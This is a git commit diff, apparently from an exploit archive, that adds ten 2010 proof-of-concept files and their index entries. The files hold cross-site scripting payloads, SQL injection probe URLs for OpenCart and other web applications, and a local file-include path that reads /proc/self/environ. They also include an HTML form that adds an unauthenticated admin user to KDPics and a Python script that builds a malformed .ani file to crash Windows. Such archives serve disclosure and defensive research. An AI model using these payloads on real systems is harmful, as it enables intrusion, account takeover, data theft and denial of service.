Updated 06_13_2014

2014-06-13 04:39:15 +00:00 · 2014-06-13 04:39:15 +00:00 · e662f4d577
commit e662f4d577
parent 5386cedc8f
11 changed files with 313 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30362,3 +30362,13 @@ id,file,description,date,author,platform,type,port
 33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
 33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
 33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0
+33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS 'pojam' Parameter Cross Site Scripting Vulnerability",2010-03-05,hacker@sr.gov.yu,asp,webapps,0
+33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Include Vulnerability",2010-03-05,"cr4wl3r ",php,webapps,0
+33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox 'search' Page Cross Site Scripting Vulnerability",2010-03-05,Phenom,multiple,webapps,0
+33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 'mod' Parameter Local File Include Vulnerability",2010-03-06,_mlk_,php,webapps,0
+33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/VISTA '.ani' File 'tagBITMAPINFOHEADER' Denial of Service Vulnerability",2010-03-08,Skylined,windows,dos,0
+33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal 'search_result.asp' SQL Injection Vulnerability",2010-03-08,NoGe,asp,webapps,0
+33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX <= 4.2 'post.aspx' Cross-Site Scripting Vulnerability",2010-03-08,Liscker,asp,webapps,0
+33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 'default.asp' Multiple Cross Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0
+33723,platforms/php/webapps/33723.html,"KDPics 1.18 'admin/index.php' Authentication Bypass Vulnerability",2010-03-08,snakespc,php,webapps,0
+33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 'page' Parameter SQL Injection Vulnerability",2010-03-07,"Andrés Gómez",php,webapps,0
--- a/platforms/asp/webapps/33715.txt
+++ b/platforms/asp/webapps/33715.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38573/info
+
+Spectrum Software WebManager CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/Search_1.aspx?pojam=[XSS] 
--- a/platforms/asp/webapps/33720.txt
+++ b/platforms/asp/webapps/33720.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38582/info
+
+Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/elearning/search_result.asp?courses=1&course_ID=[SQL] 
--- a/platforms/asp/webapps/33721.txt
+++ b/platforms/asp/webapps/33721.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38592/info
+
+Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Max Network Technology BBSMAX 4.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forum1/post.aspx?action=newthread"><script>alert(/liscker/)</script>
--- a/platforms/asp/webapps/33722.txt
+++ b/platforms/asp/webapps/33722.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38601/info
+
+ASPCode CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ASPCode CMS 1.5.8 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/default.asp?sec=1&ma1="><script>alert("XSS");</script>
+http://www.example.com/default.asp?sec=1&tag="><script>alert("XSS");</script>
+http://www.example.com/default.asp?sec=1&ma2="><script>alert("XSS");</script>
+http://www.example.com/default.asp?sec=33&ma1=forgotpass
--- a/platforms/multiple/webapps/33717.txt
+++ b/platforms/multiple/webapps/33717.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38575/info
+
+Six Apart Vox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/explore/search/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E/
--- a/platforms/php/webapps/33716.txt
+++ b/platforms/php/webapps/33716.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38574/info
+
+Saskia's Shopsystem is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Saskia's Shopsystem beta1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/content.php?id=[LFI%00] 
--- a/platforms/php/webapps/33718.txt
+++ b/platforms/php/webapps/33718.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38576/info
+
+phpCOIN is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+phpCOIN 1.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 
--- a/platforms/php/webapps/33723.html
+++ b/platforms/php/webapps/33723.html
@ -0,0 +1,51 @@
+source: http://www.securityfocus.com/bid/38603/info
+
+KDPics is prone to a vulnerability that lets an attacker add an administrative user because it fails to adequately secure access to administrative functionality.
+
+This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+KDPics 1.18 is vulnerable; other versions may also be affected. 
+
+
+<html>
+<title>G?n?r? par KDPics v1.18 Remote Add Admin</title>
+ 
+<body link="#00FF00" text="#008000" bgcolor="#000000">
+ 
+<form method="POST" action="http://www.example.com/kdpics/admin/index.php3?page=options&categorie=">
+<input type="hidden" name="type" value="add">
+<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
+<tr>
+<td class="top">
+<p align="center"><b>User & Pass :Snakespc</b></p>
+<p align="center"><b><font face="Comic Sans MS">
+<a href="http://www.example.com//index.php?act=idx" style="text-decoration: none">
+<font color="#00FF00">[?]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
+[?] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[?] Dork:"G?n?r? par KDPics v1.18"</font></a></font></b></p>
+<p align="center"><b>Username:</b></td>
+</tr>
+<tr>
+<td height="1">
+<p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td>
+</tr>
+<tr>
+<td class="top">
+<p align="center"><b>Password:</b></td>
+</tr>
+<tr>
+ 
+<td height="22">
+<p align="center">
+<input type="password" name="adminpass" size="30" value="Snakespc"></td>
+</tr>
+<tr>
+<td align="right">
+<p align="center">
+<input type="submit" value="Add User >>" style="font-weight: 700"></td>
+</tr>
+</form>
+</table>
+</html>
+
+
+
--- a/platforms/php/webapps/33724.txt
+++ b/platforms/php/webapps/33724.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38605/info
+
+OpenCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OpenCart 1.3.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?route=product%2Fspecial&path=20&page='
+http://www.example.com/index.php?route=product%2Fspecial&path=20&page=\'
+http://www.example.com/index.php?route=product%2Fcategory&path=20&page=andres'" 
--- a/platforms/windows/dos/33719.py
+++ b/platforms/windows/dos/33719.py
@ -0,0 +1,180 @@
+source: http://www.securityfocus.com/bid/38579/info
+
+Microsoft Windows is prone to a remote denial-of-service vulnerability when processing '.ani' files.
+
+Successful exploits will cause the vulnerable applications that use the affected APIs to crash or become unresponsive, denying service to legitimate users. 
+
+
+def Save(name, content):
+  file = open(name, 'w');
+  try:
+    file.write(content);
+  finally:
+    file.close();
+
+def DWord(*values):
+  return DWords(values);
+def DWords(values):
+  chars = [];
+  for value in values:
+    for i in range(4):
+      byte = (value >> (i * 8)) & 0xFF;
+      chars.append(chr(byte));
+  return ''.join(chars);
+
+def Word(*values):
+  return Words(values);
+def Words(values):
+  chars = [];
+  for value in values:
+    for i in range(2):
+      byte = (value >> (i * 8)) & 0xFF;
+      chars.append(chr(byte));
+  return ''.join(chars);
+
+def Byte(*values):
+  return Bytes(values);
+def Bytes(values):
+  chars = [];
+  for value in values:
+    chars.append(chr(value));
+  return ''.join(chars);
+
+def Chunk(type_id, data, fake_size = None):
+  if fake_size is not None:
+    return type_id + DWord(fake_size) + DataOf(data);
+  return type_id + DWord(SizeOf(data)) + DataOf(data);
+
+def Pad2DWords(string):
+  pad = (4 - (len(string) % 4)) % 4;
+  return string + '\0' * pad;
+
+def SizeOf(thing):
+  return len(DataOf(thing));
+
+def DataOf(thing):
+  if type(thing) == str:
+    return thing;
+  elif type(thing) == list:
+    struct_str_list = [];
+    try:
+      for struct_member in thing:
+        struct_str_list.append(DataOf(struct_member));
+    except:
+      print 'Member of %s' % repr(thing);
+      raise;
+    return ''.join(struct_str_list);
+  else:
+    raise AssertionError('Struct contains data of unhandled type %s' % \
+          type(thing));
+
+BITMAPINFOHEADER = [
+  #http://msdn.microsoft.com/en-us/library/aa930622.aspx
+  DWord(0),           # biSize; (size of this structure) *SET LATER*
+  DWord(0),           # biWidth;
+  DWord(0),           # biHeight;
+  Word(0),            # biPlanes;
+  Word(0),            # biBitCount;
+  DWord(0),           # biCompression;
+  DWord(0),           # biSizeImage;
+  DWord(0),           # biXPelsPerMeter;
+  DWord(0),           # biYPelsPerMeter;
+  DWord(0x3F000000),  # biClrUsed (size of color table) (< 0x3FFFFFF4 to prevent overflow).
+  DWord(0),           # biClrImportant
+];
+# Set BITMAPINFOHEADER.biSize
+BITMAPINFOHEADER[0] = DWord(SizeOf(BITMAPINFOHEADER));
+
+RGBQUAD = DWords([
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+  ]);
+
+
+ICONIMAGE = [
+  # http://msdn.microsoft.com/en-us/library/ms997538.aspx
+  BITMAPINFOHEADER,  # icHeader; // DIB header
+  RGBQUAD,           # icColors[1]; // Color table
+#   BYTE            icXOR[1];      // DIB bits for XOR mask
+#   BYTE            icAND[1];      // DIB bits for AND mask
+];
+
+ICONDIR = [
+  # http://msdn.microsoft.com/en-us/library/ms997538.aspx
+  Word(0), # idReserved
+  Word(1), # idType (1=.ICO, 2=.CUR)
+  Word(1), # idCount (number of images)
+];
+
+ICONDIRENTRY = [
+  # http://msdn.microsoft.com/en-us/library/ms997538.aspx
+  Byte(0x20),         # bWidth
+  Byte(0x20),         # bHeight
+  Byte(0x0),          # bColorCount
+  Byte(0),            # bReserved (must be 0)
+  Word(0),            # wPlanes (color planes)
+  Word(0),            # wBitCount (bits per pixel)
+  DWord(0),           # dwBytesInRes (bitmap resource size)
+  DWord(0),           # dwImageOffset (bitmap offset in this file) *SET LATER*
+];
+# Set ICONDIRENTRY.dwImageOffset:
+ICONDIRENTRY[6] = DWord(SizeOf(ICONIMAGE));
+ICONDIRENTRY[7] = DWord(SizeOf(ICONDIR) + SizeOf(ICONDIRENTRY));
+
+icon_chunk = Chunk('icon', ICONDIR + ICONDIRENTRY + ICONIMAGE);
+
+fram_data = 'fram' + icon_chunk;
+
+list_fram_chunk = Chunk('LIST', fram_data, 0x231C);
+
+anih_cFrames = 0x01;
+anih_cSteps = 0x01;
+anih_cx = 0;
+anih_cy = 0;
+anih_cBitCount = 0x00;
+anih_cPlanes = 0x01;
+anih_JifRate = 0x0C;
+anih_flags = 0x01;
+# The first DWORD is the length, which we don't know yet:
+anih_struct = [
+  DWord(0),    # length of structure, to be set later.
+  DWord(1),    # cFrames
+  DWord(1),    # cSteps
+  DWord(0),    # cx (must be 0)
+  DWord(0),    # cy (must be 0)
+  DWord(0),    # cBitCount
+  DWord(1),    # cPlanes
+  DWord(0xC),  # JifRate
+  DWord(1),    # flags (1 = AF_ICON
+];
+# Set the length of the structure:
+anih_struct[0] = DWord(SizeOf(anih_struct));
+anih_chunk = Chunk('anih', anih_struct);
+
+inam_data = Pad2DWords('MSIE 8.0 .ANI vulnerability\0');
+inam_chunk = Chunk('INAM', inam_data);
+
+iart_data = Pad2DWords('SkyLined http://skypher.com\0');
+iart_chunk = Chunk('IART', iart_data);
+
+info_chunk = 'INFO' + inam_chunk + iart_chunk;
+list_info_chunk = Chunk('LIST', info_chunk);
+
+acon_chunk = 'ACON' + list_info_chunk + anih_chunk + list_fram_chunk;
+
+riff_chunk = Chunk('RIFF', acon_chunk, 0x23A8);
+
+html = '<HEAD><META http-equiv="refresh" content="0"/></HEAD>' + \
+       '<BODY style="cursor:url(repro.ani)"></BODY>';
+
+Save('repro.ani', riff_chunk);
+Save('repro.html', html);
+